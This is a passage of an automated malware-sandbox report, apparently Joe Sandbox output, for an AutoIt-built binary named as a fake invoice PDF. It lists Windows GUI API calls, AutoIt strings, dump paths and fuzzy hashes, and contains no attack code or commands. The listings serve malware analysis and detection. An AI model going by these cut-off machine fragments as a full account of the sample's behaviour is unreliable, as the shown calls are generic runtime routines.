                                                                              • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                              • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                              • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                              • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                              • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                              • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                              • GetClientRect.USER32(?,?), ref: 00470371
                                                                              • GetStockObject.GDI32(00000011), ref: 00470391
                                                                              • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                              • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                              • String ID: AutoIt v3 GUI
                                                                              • API String ID: 867697134-248962490
                                                                              • Opcode ID: 7e5534ef3e4931e9498df3a79ff3cd90bcc0bde971d733e4590271a7113783dd
                                                                              • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                              • Opcode Fuzzy Hash: 7e5534ef3e4931e9498df3a79ff3cd90bcc0bde971d733e4590271a7113783dd
                                                                              • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                              APIs
                                                                              • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window
                                                                              • String ID: 0
                                                                              • API String ID: 2353593579-4108050209
                                                                              • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                              • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                              • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                              • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                              APIs
                                                                              • GetSysColor.USER32 ref: 0044A11D
                                                                              • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                              • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                              • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                              • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                              • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                              • GetWindowDC.USER32 ref: 0044A277
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                              • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                              • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                              • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                              • String ID:
                                                                              • API String ID: 1744303182-0
                                                                              • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                              • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                              • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                              • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll$__wcsnicmp
                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                              • API String ID: 790654849-1810252412
                                                                              • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                              • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                              • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                              • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: InitVariant
                                                                              • String ID:
                                                                              • API String ID: 1927566239-0
                                                                              • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                              • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                              • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                              • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                              APIs
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                              • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                              • IsWindow.USER32(?), ref: 0046DBDE
                                                                              • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                              • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                              • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                              • API String ID: 1322021666-1919597938
                                                                              • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                              • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                              • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                              • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                              • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                              • __wsplitpath.LIBCMT ref: 0045DF54
                                                                              • _wcscat.LIBCMT ref: 0045DF6C
                                                                              • _wcscat.LIBCMT ref: 0045DF7E
                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                              • _wcscpy.LIBCMT ref: 0045E019
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                              • String ID: *.*
                                                                              • API String ID: 3201719729-438819550
                                                                              • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                              • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                              • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                              • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll$IconLoad
                                                                              • String ID: blank$info$question$stop$warning
                                                                              • API String ID: 2485277191-404129466
                                                                              • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                              • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                              • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                              • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                              APIs
                                                                              • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                              • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                              • strncnt.LIBCMT ref: 00428646
                                                                              • strncnt.LIBCMT ref: 0042865A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: strncnt$CompareErrorLastString
                                                                              • String ID:
                                                                              • API String ID: 1776594460-0
                                                                              • Opcode ID: 3d5b9ba0c92f4fe6760b2a2f1ed58cc80cf4b8686974248c5a816857398c4ad7
                                                                              • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                              • Opcode Fuzzy Hash: 3d5b9ba0c92f4fe6760b2a2f1ed58cc80cf4b8686974248c5a816857398c4ad7
                                                                              • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                              APIs
                                                                              • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                              • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                              • GetWindowRect.USER32(?,?), ref: 00454688
                                                                              • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                              • GetDesktopWindow.USER32 ref: 00454708
                                                                              • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                              • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                              • GetClientRect.USER32(?,?), ref: 0045476F
                                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                              • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                              Similarity
                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                              • String ID:
                                                                              • API String ID: 3869813825-0
                                                                              • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                              • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                              • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                              • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                              • GetCursorInfo.USER32 ref: 00458E03
                                                                              Similarity
                                                                              • API ID: Cursor$Load$Info
                                                                              • String ID:
                                                                              • API String ID: 2577412497-0
                                                                              • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                              • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                              • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                              • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                              • GetFocus.USER32 ref: 004696E0
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: MessagePost$CtrlFocus
                                                                              • String ID: 0
                                                                              • API String ID: 1534620443-4108050209
                                                                              • Opcode ID: 89fabb7cd3855047bffa5b2414c716bee3c445f27ae5989893c1555ad3621718
                                                                              • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                              • Opcode Fuzzy Hash: 89fabb7cd3855047bffa5b2414c716bee3c445f27ae5989893c1555ad3621718
                                                                              • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00468107
                                                                              • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                              • GetMenuItemCount.USER32(?), ref: 00468227
                                                                              • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                              • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                              • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                              • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                              • GetMenuItemCount.USER32 ref: 004682DC
                                                                              • SetMenuItemInfoW.USER32 ref: 00468317
                                                                              • GetCursorPos.USER32(00000000), ref: 00468322
                                                                              • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                              • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                              • String ID: 0
                                                                              • API String ID: 3993528054-4108050209
                                                                              • Opcode ID: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                              • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                              • Opcode Fuzzy Hash: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                              • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                              APIs
                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                              • SendMessageW.USER32(?), ref: 0046F34C
                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                              • _wcscat.LIBCMT ref: 0046F3BC
                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                              • DragFinish.SHELL32(?), ref: 0046F414
                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                              • API String ID: 4085615965-3440237614
                                                                              • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                              • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                              • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                              • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: __wcsicoll
                                                                              • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                              • API String ID: 3832890014-4202584635
                                                                              • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                              • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                              • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                              • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 004669C4
                                                                              • _wcsncpy.LIBCMT ref: 00466A21
                                                                              • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • _wcstok.LIBCMT ref: 00466A90
                                                                                • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                              • _wcstok.LIBCMT ref: 00466B3F
                                                                              • _wcscpy.LIBCMT ref: 00466BC8
                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                              • _wcslen.LIBCMT ref: 00466D1D
                                                                              • _memset.LIBCMT ref: 00466BEE
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • _wcslen.LIBCMT ref: 00466D4B
                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                              • String ID: X$HH
                                                                              • API String ID: 3021350936-1944015008
                                                                              • Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                              • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                              • Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                              • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0045F4AE
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                              • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                              • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
